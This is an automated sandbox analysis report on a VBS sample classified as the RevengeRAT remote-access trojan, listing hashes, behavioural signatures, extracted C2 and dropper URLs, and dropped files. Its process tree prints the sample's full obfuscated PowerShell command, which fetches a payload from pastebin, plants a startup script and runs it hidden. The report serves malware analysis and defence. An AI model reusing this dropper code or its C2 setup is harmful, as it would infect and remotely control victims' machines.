Overview

overview

10

Static

static

14a8b1172f...61.vbs

windows7_x64

10

14a8b1172f...61.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    154s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    19-02-2022 09:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    14a8b1172f7f0d8cf9bc6fe3aa20f1700170b7e3ea280e85659a72099333e561.vbs

  • Size

    74KB

  • MD5

    590f345e2c9714dabfb2944aa79e7c5f

  • SHA1

    44050c1021c42197d9ce085d7cec9a395d4a9fcc

  • SHA256

    14a8b1172f7f0d8cf9bc6fe3aa20f1700170b7e3ea280e85659a72099333e561

  • SHA512

    c5c65ffc313dca8ce9aa82ee873847787ca0c725f240c2a83aac2328cca6450a5df4b57ee08419f87dd06370e811d6b70f7225800fc94311075670f7c1f9244f

Score
10/10
revengeratclienttrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/qZMWnhpc

Extracted

Family

revengerat

Botnet

Client

C2

kimjoy.ddns.net:2021

Mutex

RXQLV8XYTDNHNSA

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14a8b1172f7f0d8cf9bc6fe3aa20f1700170b7e3ea280e85659a72099333e561.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted -Command IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,113,90,77,87,110,104,112,99,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aidcpnuh\aidcpnuh.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:744
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9279.tmp" "c:\Users\Admin\AppData\Local\Temp\aidcpnuh\CSCC12292E43E464B49A3D222537BF511F.TMP"
            5⤵
              PID:520
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            4⤵
              PID:652
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
        1⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:3120

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        MD5

        c163ab439d3c5ab9abff81272c463c19

        SHA1

        3f87e709ce5e2b8a4eed5dd1c9f4252549b0b94f

        SHA256

        4dbf858a84ae2a2ff8368e49a188c61d41606da2ce8aece245f70f787029ff5a

        SHA512

        473f1ee75bcd06a2f53b3b4605a4805c9b1fca5b3b87080d9708308a426cb4b8e81543a982f9c94d2fb5a1101f264e0533663cb471035e83e1abf4126d91ec79

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        3db5a3b556b01c59c5812cb86abb674e

        SHA1

        3848e5419d5c47879f159247e4f1b08005674cf0

        SHA256

        218d487f881ce9640acd16f7476b445471b83671569e99973f77d0bbf6c42ffa

        SHA512

        3eb6575d3e476053a65b2631b0cd0d584056ca476058ee2706c69fe10b0502460c40f8985f1f4666e42fba2809924f6dc34ba2e9b2629217542e45cb3640adcd

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\RES9279.tmp
        MD5

        8f0cd5e45b8405cfddf4d53451e58551

        SHA1

        8d2a1c23e610955d7e45156c0c7ad006d132c8bc

        SHA256

        381a88ea2e2995023abf0aef956074dbf14c361c7dd381f173c1e3d6a0b0913c

        SHA512

        e4c60bb1eaec6a200144ea956b501ee4eda98597c31a1f658e5a5352b00ee004194732a0981914c1f250ba35ce80862bbef5de9b67da9b7ddf275177026df7ed

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        MD5

        61daa29f8789c8955145c4fd95d082a2

        SHA1

        92277533be60b333f4e79b1f6e5d821cfa9f818e

        SHA256

        3248338f08f0a3316dd06a3893ff4a38459eb812d2463265deb73eef4dfcddb3

        SHA512

        21dc0806c3337121cb68ed5a4d552fac992371b02fbbb664dd703c6cf586082d02c74db82261405e1af6acab3524c0b48eed12d1270cdfa5c9fc0a3faa2757b3

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\aidcpnuh\aidcpnuh.dll
        MD5

        dbbd7c278d06b55f32a1136ed21aa474

        SHA1

        802e1b0e308fb0827c4273df5e07aa5d2c584a77

        SHA256

        9f9ef1159830fce2fb28e36227ab4121c78baf0fb7a5ed3afa1634929cac945d

        SHA512

        55def49244fb8e034428464a30d5884794725166c498c55197930eaaf632326c6c97a3b22c9aeab3f7f7e2a6e66cc16e51db6c72125d1a3cc4a9c6e648a3c4e5

        Download Submit
      • \??\c:\Users\Admin\AppData\Local\Temp\aidcpnuh\CSCC12292E43E464B49A3D222537BF511F.TMP
        MD5

        44c5c959f5ea52c69dc6a5439276521e

        SHA1

        75c187e4d4619b0646ec7bf4894340c4028de0a2

        SHA256

        08f2afe7ffaad6c88da9e641ecacfc153f6843d8e7332b45d286113942a6f61c

        SHA512

        9723711073a3e1eb6fb54a788173dd9f041fe28439a77360ce9d8e9a5c3fbb35e842166b0c8f3ba687b6ef7eeeec4c8d736754c9416a79e44255cc2a2803ea9e

        Download Submit
      • \??\c:\Users\Admin\AppData\Local\Temp\aidcpnuh\aidcpnuh.0.cs
        MD5

        e03b1e7ba7f1a53a7e10c0fd9049f437

        SHA1

        3bb851a42717eeb588eb7deadfcd04c571c15f41

        SHA256

        3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

        SHA512

        a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

        Download Submit
      • \??\c:\Users\Admin\AppData\Local\Temp\aidcpnuh\aidcpnuh.cmdline
        MD5

        7e4f20682dcffc9282c77e776e8354bb

        SHA1

        635217958a0509195599210f23e031c8765c09c3

        SHA256

        b411db25634acf41ab31a5f5605e6c4f2c8b2d9415d9beee2021e85587403a62

        SHA512

        6805099ff404a8361d921e064dcd9a8cbce40b362d18494198048b7146095f5a29ddbfaed2ff155124e28656b42ad925c7860b766a40b1a2864485da158b6eb8

        Download Submit
      • memory/652-149-0x0000000074EEE000-0x0000000074EEF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/652-150-0x00000000056E0000-0x0000000005C84000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/652-146-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/652-152-0x00000000051F0000-0x00000000051F1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/652-151-0x00000000053A0000-0x000000000543C000-memory.dmp
        Filesize

        624KB

        Download
      • memory/1444-136-0x00007FFCDDA83000-0x00007FFCDDA85000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1444-140-0x00000187F9E20000-0x00000187F9E96000-memory.dmp
        Filesize

        472KB

        Download
      • memory/1444-138-0x00000187F8AA3000-0x00000187F8AA5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1444-137-0x00000187F8AA0000-0x00000187F8AA2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1444-139-0x00000187F8AA6000-0x00000187F8AA8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3120-155-0x000001D95EB50000-0x000001D95EB54000-memory.dmp
        Filesize

        16KB

        Download
      • memory/3120-153-0x000001D95C420000-0x000001D95C430000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3120-154-0x000001D95C480000-0x000001D95C490000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4844-134-0x0000021DD5526000-0x0000021DD5528000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4844-133-0x0000021DD5523000-0x0000021DD5525000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4844-130-0x0000021DD61B0000-0x0000021DD61D2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4844-132-0x0000021DD5520000-0x0000021DD5522000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4844-131-0x00007FFCDDA83000-0x00007FFCDDA85000-memory.dmp
        Filesize

        8KB

        Download